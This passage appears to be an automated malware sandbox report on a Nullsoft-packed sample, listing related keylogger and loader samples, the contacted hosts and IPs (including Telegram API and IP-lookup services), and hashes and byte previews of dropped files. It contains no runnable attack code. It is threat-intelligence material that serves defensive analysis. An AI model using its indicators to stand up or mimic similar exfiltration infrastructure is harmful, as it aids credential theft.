                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                TimeTypeDescription
                                                                13:56:30API Interceptor16098x Sleep call for process: m0CZ8H4jfl.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                149.154.167.220fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                  RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                      YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                            MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                              r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    193.122.6.168FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    ql8KpEHT7y.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    8kDIr4ZdNj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    4iDzhJBJVv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    reallyfreegeoip.orgFPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.96.1
                                                                                    RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.16.1
                                                                                    YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.112.1
                                                                                    xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 104.21.112.1
                                                                                    AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.64.1
                                                                                    MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    checkip.dyndns.comFPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 193.122.6.168
                                                                                    jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 158.101.44.242
                                                                                    fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 132.226.8.169
                                                                                    AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 132.226.247.73
                                                                                    MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 158.101.44.242
                                                                                    3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 132.226.8.169
                                                                                    api.telegram.orgfGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    ORACLE-BMC-31898USFPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 193.122.6.168
                                                                                    jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 158.101.44.242
                                                                                    fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 158.101.44.242
                                                                                    SBkuP3ACSA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    TELEGRAMRUfGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    CLOUDFLARENETUSMessage 2.emlGet hashmaliciousUnknownBrowse
                                                                                    • 172.64.41.3
                                                                                    FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    frosty.arm.elfGet hashmaliciousMiraiBrowse
                                                                                    • 104.23.145.230
                                                                                    Message.emlGet hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    s2Jg1MAahY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.26.12.205
                                                                                    fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.96.1
                                                                                    https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 1.1.1.1
                                                                                    https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 172.64.147.188
                                                                                    jd4t3R7hOq.exeGet hashmaliciousAzorultBrowse
                                                                                    • 104.21.75.48
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    54328bd36c14bd82ddaa0c04b25ed9adFPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.96.1
                                                                                    RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.96.1
                                                                                    YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.96.1
                                                                                    xom6WSISuh.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    • 104.21.96.1
                                                                                    AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.96.1
                                                                                    eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    MzqLQjCwrw.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    3WgNXsWvMO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    3b5074b1b5d032e5620f69f9f700ff0es2Jg1MAahY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                    • 149.154.167.220
                                                                                    YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 149.154.167.220
                                                                                    MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    MWP0FO5rAF.exeGet hashmaliciousUnknownBrowse
                                                                                    • 149.154.167.220
                                                                                    37f463bf4616ecd445d4a1937da06e19fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.185.110
                                                                                    r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.185.110
                                                                                    RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.185.110
                                                                                    4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.185.110
                                                                                    4hQFnbWlj8.exeGet hashmaliciousVidarBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.185.110
                                                                                    Mmm7GmDcR4.exeGet hashmaliciousLummaCBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.185.110
                                                                                    g7Mz6hLxqw.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.185.110
                                                                                    ln5S7fIBkY.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.185.110
                                                                                    Osb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.185.110
                                                                                    SvmL9tW29w.exeGet hashmaliciousGuLoaderBrowse
                                                                                    • 142.250.185.161
                                                                                    • 142.250.185.110
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp\System.dllPURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      O0rhQM49FL.exeGet hashmaliciousUnknownBrowse
                                                                                                        Process:C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):35898
                                                                                                        Entropy (8bit):4.579363273950714
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:N0tkFClF9lfUBtLjaEW7WIiOnvFjwJo2PX6Av1FMRvCGlxp8EKtyZQFH2:NjFw9wt36WyqJXJFMtCG79K8ZQg
                                                                                                        MD5:781E08B28F6FF42F07049A8394BA7E21
                                                                                                        SHA1:11F03490DF96BBA3D463E80FEF706BF1D8ABC0D0
                                                                                                        SHA-256:4CF7FB5C20E8C886C32125C2406D63B48ED997EBECDE2DA05314BE47D633FB8C
                                                                                                        SHA-512:0BD1560B8C6140ABAC9F85B67A26EED9E8EF0CAB4AAA39C98325A8752348238238C34ECC1216774D8373A3BA927C01B49D93FF9EC3380B81DC20F0C7AA97F6F1
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:..........x.444...............y.............55.....=.5...........;.....................>>>>....@@@.......................xx......................................+.%.............................q........ff....T............................GG....J........tt.v.......'.........................h.ooo................C.......................--........SS.........B................................).0.2.RR.QQ......KK.....O.........2222..........q.u..|.............................yy...............................VVVV....Q..ZZZ.h._..666666.QQQ.......................................YY.......__..........6.........4.#.....B...111.........................`.\..............LL.....JJJ...s........III....t..``.S.........P.~~~~~..........................i.....a....22.EE.............................................ss.....<.........~~...................99..dddd........5....x.q...VVVV......................................hhhh............YY....444..d..........||||.j....................zz...............s...........
                                                                                                        Process:C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):56641
                                                                                                        Entropy (8bit):1.2318917163845036
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                        MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                        SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                        SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                        SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................
                                                                                                        Process:C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):268719
                                                                                                        Entropy (8bit):7.819557885033517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:FYAs+3YWbK7pvS5/d7Grkyhao1wVniHp33Kpm8:GAs+3hK7pvSVd7no1wZgmm8
                                                                                                        MD5:6298E6324DAADEF6250CF15ED77A3701
                                                                                                        SHA1:62C54C2615C13B3A5416B41E592380280C224EF0
                                                                                                        SHA-256:29601B875D0D865DEF56CDEF4F56FBBC297E6D543057F4FA27BEB60402D92A95
                                                                                                        SHA-512:B4F69E9BC6ECF8800ACF2D211DD48AC71670C00BFC7F7BE04A7BB227D65B40D87E7A72FA3E3ED37BB7654ECFD82EE40EC29EC251977AD4841295E411D2B56249
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:..............&&&............_...........&................................_.j.././..........|.......1...........\\......^^...cc..N.... .y.......666.........................7................>>............mmmmm.....H....jjjj........qq............::.h.....................:::..'''''.......L...0...vvv..D......TTTTTTT..jj.....444.LL.>....a......vv........9.QQ......111........u..........F..kkk........Z..............hh.``.....p..........~~~~...............................b.............................>>.............[.......bb.............PP.ll.........666...........gg.....P..99........##.........%....R................~.z.......9.333...............................C.....&.......t.`..ooo........((........K.DDDDDD.]...........X....CCC.....................66..........eeeeeee......%%..uuuuu.~~....k........................................ ..................:::::.GG...........................ii......RR.......................;;...........E.W.\.......2222........t................d.wwwww.......>>....
                                                                                                        Process:C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):345
                                                                                                        Entropy (8bit):4.241929841155785
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                        MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                        SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                        SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                        SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                        Process:C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                        Category:dropped
                                                                                                        Size (bytes):210366
                                                                                                        Entropy (8bit):1.240975322465592
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                        MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                        SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                        SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                        SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................
                                                                                                        Process:C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):363811
                                                                                                        Entropy (8bit):1.2512349423386382
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                        MD5:BFEA15C03AB295424981A73637A19491
                                                                                                        SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                        SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                        SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                        Malicious:false
                                                                                                        Preview:...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............
                                                                                                        Process:C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11776
                                                                                                        Entropy (8bit):5.655335921632966
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                        MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                        SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                        SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                        SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                        Malicious:false
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: PURCHASE ORDER TRC-090971819130-24_pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: RFQ December-January Forcast and TCL.exe, Detection: malicious, Browse
                                                                                                        • Filename: PAYMENT ADVICE TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: PURCHASE ORDER TRC-0909718-24_pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: SWIFT091816-24_pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: SWIFT09181-24_pdf.exe, Detection: malicious, Browse
                                                                                                        • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1152
                                                                                                        Entropy (8bit):3.243517107466583
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:8wl0IsXyEKW2je/tz0/CSL6/cBnwgXl341DEDeG41DED0MsQ1olfW+kjcmAahwbn:8HlKPjeWLrFPjPI4izZMWJpqy
                                                                                                        MD5:4E09F5DB5EB2E6D5C23DB2EDAB5B1012
                                                                                                        SHA1:9A69B01C329E9F7F2177F570B331DFB27265B1E9
                                                                                                        SHA-256:FF83A11BEC2485FC24A0D8C76FD9A1477FE91B755557DBD553B0719C87ECF56B
                                                                                                        SHA-512:C6ABFBD534F32F05DCBD56241C95FC4A7352AB44ED639DEA79897CBFFA0A4A5F603CA352CD51AFED3A078FFA6ED38FB5862D6F5F9EEB6EF3DC11B044D178EBBA
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F........................................................k....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.N.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.............w.............>.e.L.:..er.=w........
                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                        Entropy (8bit):7.9579000021212085
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:m0CZ8H4jfl.exe
                                                                                                        File size:432'979 bytes
                                                                                                        MD5:ad29d6168abbec988896c57d4d25e2ed
                                                                                                        SHA1:469b06a2d18997abeb8829bd6e495cdfee811270
                                                                                                        SHA256:d279cafd050cd071af764df4cc856e9e188ce0c920d13429a3b33129c7e4cee2
                                                                                                        SHA512:5b5c702fc4d24dc03e46f5238969d7f6010d1298a928cc6dcdbfedf69cc8440e53480ddbac57deef9d100499f97d18b55f895770bb916a5f29a6770594041468
